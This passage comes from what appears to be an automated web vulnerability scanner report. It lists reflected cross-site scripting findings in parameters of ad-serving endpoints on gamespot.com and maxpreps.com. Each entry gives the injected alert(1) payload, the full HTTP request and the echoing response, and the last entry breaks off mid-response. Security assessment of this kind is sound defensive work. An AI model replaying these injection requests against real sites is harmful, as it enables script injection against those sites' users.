This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=6&NCAT=1%3A&PTYPE=2000&PID=&GAMEID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=37694132&ADREQ&beacon=1d166b<a>5876ce1eaec&cookiesOn=1 HTTP/1.1
Host: mads.gamespot.com
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:11 GMT
Server: Apache/2.2
Content-Length: 444
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:11 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=6&NCAT=1%3A&PTYPE=2000&PID=&GAMEID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=37694132&ADREQ&beacon=1d166b<a>5876ce1eaec&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='116658761' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw3.cnet.com::2781416336
...[SNIP]...

3.631. http://mads.gamespot.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.gamespot.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88812'%3balert(1)//d1cbce0c6b2 was submitted in the PAGESTATE parameter. This input was echoed as 88812';alert(1)//d1cbce0c6b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=88812'%3balert(1)//d1cbce0c6b2&SITE=6&NCAT=1%3A&PTYPE=2000&PID=&GAMEID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=37694132&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.gamespot.com
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:38:47 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:38:47 GMT

/* MAC ad */;window.CBSI_PAGESTATE='88812';alert(1)//d1cbce0c6b2';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw1.cnet.com::2886253456 2011.04.27.23.38.47 *//* MAC T 0.0.0.0 */

3.632. http://mads.gamespot.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.gamespot.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload b2351<a>1c7456999b1 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=6b2351<a>1c7456999b1&NCAT=1%3A&PTYPE=2000&PID=&GAMEID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=37694132&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.gamespot.com
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:38:48 GMT
Server: Apache/2.2
Content-Length: 479
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:38:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=6b2351<a>1c7456999b1&NCAT=1%3A&PTYPE=2000&PID=&GAMEID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=37694132&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='62351174569991' PTYPE='20
...[SNIP]...

3.633. http://mads.maxpreps.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75842'%3balert(1)//eef7ed62293 was submitted in the BRAND parameter. This input was echoed as 75842';alert(1)//eef7ed62293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=6475842'%3balert(1)//eef7ed62293&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:44 GMT
Server: Apache/2.2
Content-Length: 1137
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:44 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=6475842'%3balert(1)//eef7ed62293&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=17528&sg=1815&o=1%253a&h=cn&p=2&b=6475842';alert(1)//eef7ed62293&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656C230&orh=maxpreps.com&ort=&oepartner=&epartner=&ppartner=&pdom=
...[SNIP]...

3.634. http://mads.maxpreps.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload d4beb*/alert(1)//4f8742764e2 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64d4beb*/alert(1)//4f8742764e2&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:46 GMT
Server: Apache/2.2
Content-Length: 1134
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:46 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64d4beb*/alert(1)//4f8742764e2&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('
...[SNIP]...

3.635. http://mads.maxpreps.com/mac-ad [CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload b9366*/alert(1)//ee33eb92f6b was submitted in the CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJSb9366*/alert(1)//ee33eb92f6b&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:02 GMT
Server: Apache/2.2
Content-Length: 1056
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:02 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJSb9366*/alert(1)//ee33eb92f6b&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

3.636. http://mads.maxpreps.com/mac-ad [DVAR_FIRSTPAGE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the DVAR_FIRSTPAGE request parameter is copied into a JavaScript inline comment. The payload 78497*/alert(1)//dba92238d89 was submitted in the DVAR_FIRSTPAGE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=178497*/alert(1)//dba92238d89&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:14 GMT
Server: Apache/2.2
Content-Length: 1151
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:14 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=178497*/alert(1)//dba92238d89&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('
...[SNIP]...

3.637. http://mads.maxpreps.com/mac-ad [DVAR_SESSION parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 1b894*/alert(1)//405012c1ed1 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c1b894*/alert(1)//405012c1ed1&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:01 GMT
Server: Apache/2.2
Content-Length: 1149
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:01 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c1b894*/alert(1)//405012c1ed1&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('
...[SNIP]...

3.638. http://mads.maxpreps.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload f1d52*/alert(1)//0549522db59 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3Af1d52*/alert(1)//0549522db59&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:39 GMT
Server: Apache/2.2
Content-Length: 1155
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:39 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3Af1d52*/alert(1)//0549522db59&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('
...[SNIP]...

3.639. http://mads.maxpreps.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload ca7ea<a>26de8d56795 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=ca7ea<a>26de8d56795&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:16 GMT
Server: Apache/2.2
Content-Length: 524
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:16 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=ca7ea<a>26de8d56795&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='MAXPREPS' BRAND='64' SITE='189' SP='63' CNET-PTYPE=
...[SNIP]...

3.640. http://mads.maxpreps.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 4d38c*/alert(1)//dc321b538c7 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|4d38c*/alert(1)//dc321b538c7 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:26 GMT
Server: Apache/2.2
Content-Length: 1135
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:26 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|4d38c*/alert(1)//dc321b538c7" _REQ_NUM="0" */document.write('
...[SNIP]...

3.641. http://mads.maxpreps.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c83f'%3balert(1)//8cb17f520e5 was submitted in the PAGESTATE parameter. This input was echoed as 7c83f';alert(1)//8cb17f520e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|7c83f'%3balert(1)//8cb17f520e5 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:24 GMT
Server: Apache/2.2
Content-Length: 1136
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:24 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxprep
...[SNIP]...
%2526&pg=&t=2011.04.27.23.40.24/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='1|11079|;maxpreps.com;;|7c83f';alert(1)//8cb17f520e5';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw9.cnet.com::1513630016 2011.04.27.23.40.24 *//* MAC T 0.0.3.3 */

3.642. http://mads.maxpreps.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload 3315f<a>4e6b66ed632 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=1003315f<a>4e6b66ed632&SP=63 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:33 GMT
Server: Apache/2.2
Content-Length: 529
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=1003315f<a>4e6b66ed632&SP=63" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='MAXPREPS' BRAND='64' SITE='189' SP='63' CNET-PTYPE='10' POS='1003315fa4e6b66ed632' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _
...[SNIP]...

3.643. http://mads.maxpreps.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into a JavaScript inline comment. The payload fdf8e*/alert(1)//96ca9bd0bf4 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100fdf8e*/alert(1)//96ca9bd0bf4&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:19 GMT
